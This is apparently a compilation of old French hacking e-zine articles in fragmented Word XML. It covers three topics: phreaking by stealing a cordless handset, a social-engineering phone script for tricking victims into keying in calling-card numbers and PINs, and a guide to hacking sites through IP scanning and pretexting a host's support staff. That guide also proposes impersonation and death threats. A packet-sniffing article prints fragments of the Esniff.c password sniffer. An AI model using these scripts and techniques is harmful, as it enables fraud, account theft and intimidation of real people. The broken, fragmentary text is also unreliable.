je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heeuuu oui pourquoi pa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voila,de quel couleur est le cheval NOIRE de Zorro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heeuu noi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bien joue une derniere question, comment s'appelle le livre "L'ETRANGER" d'Albert Camu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heeeeuuuuuuuu l'etrang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 Ouuuiiiii c'est super, vous avez gagner un telephone sans fil Alcatel eole 170,patientez quelques instant,la standartiste va prendre vos coordonnees,au revoi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v merci beaucoup au revoi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Et voila voila vous avez une beige box des temps moderne,pour ceux qui n'aurait rien compris il s'agit en fait d'envoyer un telephone sans fil multicombines et garder les combines supplementair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f course,a une personne n'habitant pas tres loin de chez vous et faire des appels sans payer un rond,une fois le combine recharge sur votre prise telephonique,allez a moins de 400 m de la base ou est le telephone sans fil (chez la victime) et appuyez sur LIGNE  la ÔÔ joie ÔÔ bonheur vous avez la tonalitee tant reve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S Essayer quand meme de savoir si la personne a une ligne restreinte si elle en a une,cette methode ne vaut pas un clou (vous ne pourrez callez que en local et vous ne pourrez pas faire les numero dit a attrapes-couillons,08 36 68 et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 Phreaking  Rulez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color w:val="000080"/>
        </w:rPr>
        <w:t>Comment se procurer un numero de carte pastel (carte fuck telecom ), par Par  .¤ViRuS¤.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>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est ce qu'une carte pastel diront certains, le premier qui se dit Phreaker et qui me mail en me demandant keskesesa je le @#?;^$. Donc une carte pastel est une carte emise par fuck tele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on peut utiliser partout dans le monde et cerise sur le gateau,on n'est pas oblige d'introduire la carte dans une cabine vu qu'on peut appeler de chez quelqu'un mais la com sera facture direct sur cette putain de tecar.C'est comme un abonnement qu'on peut emmener partout avec so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objectif est donc de se procurer le numero de la carte avec le code confidentiel,9 chiffres pour le n° de carte et non pas 10 comme j'ai pu le lire sur certain doc,et 4 chiffres pour le co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Une fois encore il va falloir faire du social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ici ma techniqu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 victi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bonjour M(onsieur) (adame) ici monsieur jean bobine du service gestion informatique de fuck  heeuu france tele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oui il y a un problem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heu en quelque sorte oui mais pas bien grave rassurez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Qu'est ce qui se pas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voila suite a une deterioration sans doute volontaire,dans un de nos M895 TXV nous sommes contraint de rappeler tous nos clients possedant une carte france telecom.</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la personne vous dis qu'elle n'a pas de carte france telecom,excusez vous en disant que c'etait peut etre un homonyme et notez son n° quelque part si vous voyez que c'est un bon pigeon ça peut servir.Si la personne en a une, bingo, lisez ce qui sui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vous avez bien une carte france telecom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oui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voila ce que vous allez faire,vous allez taper sur votre telephone le numero de votre carte suivi de votre code lentement car notre telephone est relie a l'ordinateur et votre numero sera automatiquement reintroduit dans l'ordinateur sans que nous en prenions connaissance ainsi il n'y a aucun risque d'utilisation frauduleuse de votre car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ah oui d'accord c'est nouveau comme system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oui nous avons etudie ce dispositif pour la securite de nos clients (mon cu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donc je tape bip biip biiiiip</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ien sur vous aurez soit fait un montage pour enregistrer les tones,soit si votre phone le permet,enregistrer directement la discussion donc a ce moment la fermez la pour une meilleur qualite d'ecou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voila j'ai fini il vous faut autre chos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oui votre adresse exacte,la ville et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oui j'habite au 154 avenue du general stup hide ,19871 téainteubai etc....</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je vous remercie de votre amabilite au re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 au revoi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voici l'homme le plus heureux du monde une fois ces tones entre vos mains qu'il va falloir dechiffrer mais bon c'est l'histoire de quelques second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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment pirater des sites web/des serveurs, par Clad Strife  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>|</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> A tout ceux qui associent la reprise d'articles à leur qualité. Je vais expliquer comment faire: aucune théorie; uniquement du technique, ça fera plaisir. Ce genre de techniques s'apparente à celles que les vrais hackers utilisent: donc basée surtout sur la réflexion, et un sens de la recherch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avoir où chercher ses informations est essentiel, savoir comment fonctionne un réseau, un système l'est encore plus. A tout ceux qui apparente le brute force hacking, le flooding, les trojans(...), au domaine des lamers: ça reste vrai sauf quand on sait les utiliser dans un but efficac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a technique que je vais vous présenter s'apparente principalement su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le brute force hacking</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le social engeenering</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Application:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Partie1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>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Nous cherchons à pirater (par exemple) le site http://www.multimania.com/912hd. La première chose que les newbies cherchent à faire, c'est se connecter sur multimania.com avec un programme comme VcrackFTP, et essayer le brute force hacking avec comme login 912hd et un dico. Vous avez vu que ça marchait? moi non, désolé. Pourtant il y a bien un moyen. C'est là que s'instaure la recherche d'indices, vague puis plus approfondie: d'abord de petites marques que Multimania lach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xemp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Quand vous vous connectez sur un site multimania avec CuteFTP, une fenêtre s'ouvre et le nom multimania s'affiche en ASCIIART, sauf que c'est tellement mal présenté pour le programme que c'est illisible. Bref, l'important est de savoir que lorsque l'on se connecte au serveur il affiche quelque chos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Puis la recherche plus approfondie, c'est carrément le scanning d'IP. D'abord trouver l'ip de multimania: tracert, ou programmes et on obtie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3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est avec cet IP que tout va se jouer, on scann le réseau dans une branche de 195.154.127.1 à 195.154.137.254, et on obtient (avec les ports ouverts, donc services disponibles sur chaque serveu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8.064</w:t>
        <w:tab/>
        <w:t>ppp-64.net10.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8.154</w:t>
        <w:tab/>
        <w:t>ppp-154.net10.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8.187</w:t>
        <w:tab/>
        <w:t>ppp-187.net10.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8.232</w:t>
        <w:tab/>
        <w:t>ppp-232.net10.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019</w:t>
        <w:tab/>
        <w:t>ppp-19.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032</w:t>
        <w:tab/>
        <w:t>ppp-32.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033</w:t>
        <w:tab/>
        <w:t>ppp-33.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034</w:t>
        <w:tab/>
        <w:t>ppp-34.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041</w:t>
        <w:tab/>
        <w:t>ppp-41.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064 NNTP POP3 IMAP4</w:t>
        <w:tab/>
        <w:t>ppp-64.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065</w:t>
        <w:tab/>
        <w:t>ppp-65.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142</w:t>
        <w:tab/>
        <w:t>ppp-142.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165 DNS FTP GOPH POP3 TIME IMAP4 SNMP</w:t>
        <w:tab/>
        <w:t>ppp-165.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166</w:t>
        <w:tab/>
        <w:t>ppp-166.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172</w:t>
        <w:tab/>
        <w:t>ppp-172.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201</w:t>
        <w:tab/>
        <w:t>ppp-201.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229</w:t>
        <w:tab/>
        <w:t>ppp-229.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29.231</w:t>
        <w:tab/>
        <w:t>ppp-231.net11.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0.048 DNS FTP NNTP POP3 SNMP</w:t>
        <w:tab/>
        <w:t>www.continentalwaterways.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1.099</w:t>
        <w:tab/>
        <w:t>ppp-99.net13.magic.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030</w:t>
        <w:tab/>
        <w:t>www.multimania.c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035</w:t>
        <w:tab/>
        <w:t>www.multimania.f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050</w:t>
        <w:tab/>
        <w:t>domo.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060</w:t>
        <w:tab/>
        <w:t>dozo.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00</w:t>
        <w:tab/>
        <w:t>bytex.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20</w:t>
        <w:tab/>
        <w:t>xml.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0 DNS</w:t>
        <w:tab/>
        <w:t>ns.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1</w:t>
        <w:tab/>
        <w:t>moon.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2 DNS FTP NNTP POP3 SMTP</w:t>
        <w:tab/>
        <w:t>hop.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3 DNS</w:t>
        <w:tab/>
        <w:t>ta.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4</w:t>
        <w:tab/>
        <w:t>ga.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5</w:t>
        <w:tab/>
        <w:t>da.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6</w:t>
        <w:tab/>
        <w:t>ha.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7 DNS</w:t>
        <w:tab/>
        <w:t>tic.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8</w:t>
        <w:tab/>
        <w:t>tac.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9</w:t>
        <w:tab/>
        <w:t>toe.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40</w:t>
        <w:tab/>
        <w:t>ri.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41</w:t>
        <w:tab/>
        <w:t>dynaserv.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42</w:t>
        <w:tab/>
        <w:t>chat.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46</w:t>
        <w:tab/>
        <w:t>qui.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50</w:t>
        <w:tab/>
        <w:t>noc.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51</w:t>
        <w:tab/>
        <w:t>re.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52</w:t>
        <w:tab/>
        <w:t>bo.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53</w:t>
        <w:tab/>
        <w:t>boot.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54</w:t>
        <w:tab/>
        <w:t>tuc.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55</w:t>
        <w:tab/>
        <w:t>me.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56</w:t>
        <w:tab/>
        <w:t>hara.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57</w:t>
        <w:tab/>
        <w:t>kiri.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251</w:t>
        <w:tab/>
        <w:t>switch-1.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252</w:t>
        <w:tab/>
        <w:t>core-1-gig-eth-0-sx.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Sur ce scann on remarque que les serveurs multimania ne commenbcent à apparaitre qu'à partir de l'IP: 195.154.130.48 autrement dit: www.continentalwaterways.fr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Si on regarde les services de chaque serveur, le seul vraiment gros c'es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195.154.132.132 DNS FTP NNTP POP3 SMTP</w:t>
        <w:tab/>
        <w:t>hop.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est donc ce serveur là qu'on va penser à viser. On se doute que c'est là que se connecte les usagers multimania pour mettre à jour leurs pages, mais ça reste à vérifi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Alors on se connecte par FTP (ou port 21) à hop.multimania.n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n essaye de se logger (USER/PASS), mais ça rame... Si ça rame c'est qu'il y a du trafic sur ce serveur, si il y a du trafic c'est qu'il est important. Vous êtes surs dans 90% des cas d'être tombé sur le serveur ftp de multimania. De plus, MULTIMANIA s'affiche en AsciiArt comme avec CuteFTP. Certains me dirotn: "oui mais quand on se connecte sur son compte multimania.com/912hd, cuteftp affiche hop.multimania.net, donc ta recherche est inutile". Non, ce n'est pas inutile, car Multimania n'est qu'un exemple, et comme tous les exemples il sert à illustrer une vérité générale. Déduisez-en que ça marche pour à peu près tout les services du genr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Bon, c'est bien beau, mais si on échoue environ 5 tentatives de connection on est déconnecté. Donc la solution du brute force hacking est éliminé d'office. Il faut essayer de se logger sans les restrictions: utilisons des scanners, quand je parle de scanners je pense surtout à Ness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ous rentrer une cible, et il vous en affiche les caractéristiques avec les risques que ça comporte. Avec ce genre d'outils le piratage devient plus aisé car en affichant tous les problèmes du serveur et ses failles, y'a plus besoin d'aller chercher très loin pour pirater des serveurs mal protégés. Installez Linux, vous en serez pas moins heureu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a c'était pour le piratage d'un site perso, mais ça aurait pu aller plus loi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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Partie 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>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Piratage d'un serveur. Il existe plusieurs voies pour pirater un serveur.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Compter sur ses failles (mais je n'étudierais pa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ar le Social Engeenering</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ar des moyens détourné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e n'expliquerais pas la première, bien que ce soirt chose à faire avant tout. Parlons du social Engeenering, et du serveur. Parlons d'un serveur web à pirate: zipiz.com: la page n'a rien de particulier. Comment va-t-on se démmerder pour avoir le pass? Avant d'aller plus loin je rappelle qu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l y a 70% de chances que les passwords de différents services coincident. C'est sur cette faille que va reposer notre attaqu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n voit que le site est hosté par e-stat, c'est intéressant car e-stat demande un pass pour accéder au compte utilisateur. Donc on va sur le site estat.com. On essaye de rentrer un nom d'utilisateur bidon, on valide sans mettre de pass. Normalement une page d'erreur de pass ou d'utilisateur s'affiche puis on vous dit que si vous avez perdu votre pass, voilà comment faire, etc... je dis "normalement" car estat ne le fait pas. Il faut cliquer sur le signet "Votre compte" pour accéder à son compte et un peu plus en bas de la page on vous explique comment retrouver votre pass: donnez le N° de Série de votre compte et un email sera envoyé à l'adresse qui a été enregistrée dans vos infos. Hors vous ne pouvez accéder à cette boite e-mail, donc va falloir ruser. D'abord avoir le serial de l'accompte ça peut aider. On regarde la page où il y a la bannière estat, et on regarde le sourc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Le serial est : 13701523584</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est là qu'intervient le S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n décide d'appeler Estat (personellement allez les voir dans leurs bureaux: c'est 10 fois plus convainca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omment retrouver les informations concernant les coordonnées d'estat. On va sur networkssolutions.com ou on prend un programme qui fais des DNS lookups (WS PING PRO PACK par exemple), puis on obtient diverses infos dont l'adresse téléphone de l'administrateur. Il faut téléphoner à ce numéro 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pératrice&gt; Estat bonjour, que puis-je faire pour vo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ous&gt; Bonjour, j'ai un problème avec mon compte sur estat, est-ce que vous pourriez m'aid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pératrice&gt; Eh bien nous allons voir ça: quel est votre problèm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ous&gt; J'ai un compte estat mais je ne peux pas y accéder car je n'ai plus le pas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pératrice&gt; il vous suffit d'aller dans la partie "votre compte", on vous explique comment récupérer votre passwor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ous&gt; J'ai déjà essayé mais je n'ai encore reçu aucun mail</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Autre alternativ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ous&gt; Je sais bien madame, mais j'ai changé de compte mail</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pératrice&gt; Désolé nous ne pouvons rien faire pour vo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Autre alternativ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pératrice&gt; Alors je vais vous posez quelques questions concernant vos informations lors de l'inscrip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Si rien ne marche commmencez à gueuler et à fire que vous allez porter plainte. Dites que vous voulez parlez au dirigeant, etc... Pis si ça marche toujours pas, ayez du culot ou laissez tomb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l y a différentes possibilités de réponse de l'opératrice, tout dépend de la manière d'agir de celle-ci et de sa personnalité ou conception des chos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J'expose maintenant le cas de moyens détournés. J'expose ça aussi simplement que rapidement car il y a quantité indénombrable de ces moyen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je vais caractériser ces moyens par deux ou trois exempl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ous connaissez quelqu'un qui travaille à Estat et pourrait vous avoir les pass par exemp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ous pouvez vous faire passer pour un employé ou un stagiair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ous pouvez envoyer des menaces de morts, ou foutre le bordel pour avoir ces pas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t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Auteur: Clad Strif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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Article original pour IGA</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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Hunt: technique de détournement de paquets en réseau, par Clad Strife</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>|</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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Hunt: technique de détournement de paquets en réseau</w:t>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Explications sur la manière dont sont envoyés les paquet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orsqu'une requête quelconque est envoyé à un ordinateur sur un réseau, des adresses (celles du PC receveur) sont inscrites sur la trame, pour permettre la reconnaissance de ce paquet par l'ordinateur visé.</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onc sur une trame d'information on trouv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L'adresse du recev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L'adresse de l'émett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autr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adresse de l'émetteur sert à renvoyer une réponse de l'ordinateur visé à l'ordinateur émett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Cas du HUB:</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orsqu'un réseau local est relié à un hub il suffit à l'attaquant de capturer chaque paquet qui passe par son pc. Pourquoi?</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orsqu'un ordinateur A veut envoyer quelque chose à l'ordinateur C, et que l'ordinateur B veut savoir de quoi il s'agit, il lui suffit de placer un sniffer sur son pc pour connaitre la nature de toutes les trames qui passent sur le réseau. Pourquoi?</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hub n'est pas intelligent: il sert juste à relier les pc entre eux: si un ordinateur A veut envoyer à un ordinateur I, la trame va passer sur TOUS les pc (sans s'y arrêter), puis quand elle a trouvé l'ordinateur I, la trame s'arrête là et fait ce qu'elle a à faire. D'où l'intérêt de placer un sniff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Qu'est-ce qu'un sniffer:</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Qu'est-ce qu'est un sniffer: un sniffer est un outil qui permet de choper un packet qui circule sur un réseau. Chaque sniffer s'occupe d'un protocole, ou bien un sniffer de plusieurs protocoles (donc de ports) prédéfinis (voir surveiller tous les ports du PC). Le sniffer enregistre une copie de chaque packet qui sort ou entre sur le disque dur auquel il doit rendre des comptes. Mais comme ces packets peuvent constituer de grosses trames, il serait stupide de remplir son disque inutilement. Alors les sniffer vont faire un choix sélectif parmis tous ces packets. En effet: un réseau transmet en moyenne quelques milliers de packets par heure. Voyez le résultat pour une journée. Alors en plus de la sélection un sniffer ne va capturer qu'une petite partie de la trame: les premieres centaines d'octets (300 ou 400 en général); Pas plus car c'est dans ces octets que se trouvent l'identifiant et le password d'un utilisateur. Ainsi un packet sortant de la machine X, qui est intercepté par le hacker Y, permet au hacker Y d'avoir accès à la machine X. D'autres sniffers permettent à un administrateur réseau de découvrir les points faibles de son réseau et s'il s'y trouve des problèm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es sniffers fonctionnent sous Linux/UNIX ou parfois sous Windows et sont, soit en vente (réservé aux professionels), soit téléchargeable à partir de sites spécialisés. Ci-dessous une petite liste de quelques sniffers vendus en commerce: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ATM sniffer Network Analyzer of Network Associates:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;http://www.networkassociates.com&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, il décode plus de 250 protocoles (!).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Shomiti Systems Century LAN Analyzer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;http://www.shomiti.com&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, supporte le standard ethernet et marche sous Windows 95/98, NT.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PacketView de Klos Technologies:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ftp.klos.com/demo/pvdemo.zip &lt;ftp://ftp.klos.com/demo/pvdemo.zip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, ce sniffer est basé sur DOS, idéal pour les environnements ethernet.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Network Probe 8000:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;http://www.netcommcorp.com&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, fais une analyse d'environ 13 protocoles dont TCP/IP, Microsoft, NFS, Novell.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LANWatch:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;http://www.guesswork.com&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, marche sous DOS, Windows 9x et NT.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EtherPeek:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;http://www.aggroup.com&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, pour Windows et plates formes Macintosh.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Il y en a beaucoup d'autres, mais les recenser tous demanderait un travail monstre et un peu inutile. D'autant plus qu'après la liste des sniffers payants, voici les non-payants, comme dis plus haut, plus pour UNIX que pour Windows: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Esniff:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> c'est un sniffer programmé en C, basé sur UNIX, dont les codes sources sont disponibles un peu partout. Mais en voici le code sourc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Esniff.c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tdio.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ctype.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tring.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time.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file.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stropts.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signal.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types.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socket.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ioctl.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f.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nit_if.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nit_buf.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f_ar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n.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f_ether.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n_systm.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ud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p_var.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udp_var.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n_systm.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tc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p_icm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db.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arpa/inet.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ERR stder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mallo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devic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og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og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ILE *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debug=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NIT_DEV "/dev/ni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CHUNKSIZE 4096 /* device buffer siz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if_fd =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Packet[CHUNKSIZE+3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Pexit(err,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err; char *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perror(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er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Zexit(err,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err; char *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fprintf(ERR,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er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 ((struct ip *)Pa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_OFFSET (0x1FF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SZETH (sizeof(struct ether_heade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LEN (ntohs(ip-&gt;ip_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HLEN (ip-&gt;ip_h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TCPOFF (tcph-&gt;th_of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S (ip-&gt;ip_sr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D (ip-&gt;ip_d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TCPS (tcph-&gt;th_s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TCPD (tcph-&gt;th_d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eq(s,t) ((s).s_addr == (t).s_add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TCPFL(FLAGS) (tcph-&gt;th_flags &amp; (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MAXBUFLEN (128)</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_t LastTIME =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CREC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CREC *Nex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a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_t Time; /* start tim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n_addr SRC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ST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int SRCport, /* src/dst port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ST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char Data[MAXBUFLEN+2]; /* important stuff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int Length; /* current data length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int PKcnt; /* # pkt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long LASTseq;</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CREC *CLroot = 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Symaddr(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in_addr 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struct hostent *h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gethostbyaddr((char *)&amp;ip.s_addr, sizeof(struct in_addr),AF_IN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he)?(he-&gt;h_name):(inet_ntoa(i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TCPflags(fl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char fl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static char iobuf[8];</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SFL(P,THF,C) iobuf[P]=((flgs &amp; THF)?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0,TH_FIN, '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1,TH_SYN, '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2,TH_RST, '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3,TH_PUSH,'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4,TH_ACK, 'A');</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5,TH_URG, 'U');</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obuf[6]=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io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SERVp(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int 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static char buf[1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witch(por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IPPORT_LOGINSERVER: p="rlogin"; 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IPPORT_TELNET: p="telnet"; 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IPPORT_SMTP: p="smtp"; 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ault: sprintf(buf,"%u",port); p=buf; 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Ptm(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time_t *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char *p = ctim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strlen(p)-6]=0; /* strip " YYYY\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NOWt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time_t t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amp;t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Ptm(&amp;tm)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MAX(a,b) (((a)&gt;(b))?(a):(b))</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MIN(a,b) (((a)&lt;(b))?(a):(b))</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add an item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ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN)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CREC *CLtmp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CREC *)malloc(sizeof(struct CREC));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 &amp;(CLtmp-&gt;Time)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SRCip.s_addr = SIP.s_add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DSTip.s_addr = DIP.s_add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SRCport = SPOR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DSTport = DPOR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Length = MIN(LEN,MAXBUFLE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copy( (u_char *)DATA, (u_char *)CLtmp-&gt;Data, CLtmp-&gt;Length);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PKcnt = 1;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Next = CLroo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Last = NULL;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root = CLtm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CREC *GET_NODE(Sip,SP,Dip,D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in_addr Sip,D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int SP,D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struct CREC *CLr = CLroo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CLr != NULL)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CLr-&gt;SRCport == SP) &amp;&amp; (CLr-&gt;DSTport == DP) &amp;&am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Peq(CLr-&gt;SRCip,Sip) &amp;&amp; IPeq(CLr-&gt;DSTip,Di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r = CLr-&gt;Nex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CL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ADDDATA_NODE(CL,DATA,LEN)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copy((u_char *)DATA, (u_char *)&amp;CL-&gt;Data[CL-&gt;Length],LE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gt;Length += LE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PR_DATA(dp,ln)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char lastc=0;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ln-- &gt;0)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dp &lt; 32)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witch(*dp)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0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0')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n': fprintf(LOG,"\n :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ault : fprintf(LOG,"^%c", (*dp + 64));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else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sprint(*dp)) fputc(*dp,LO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 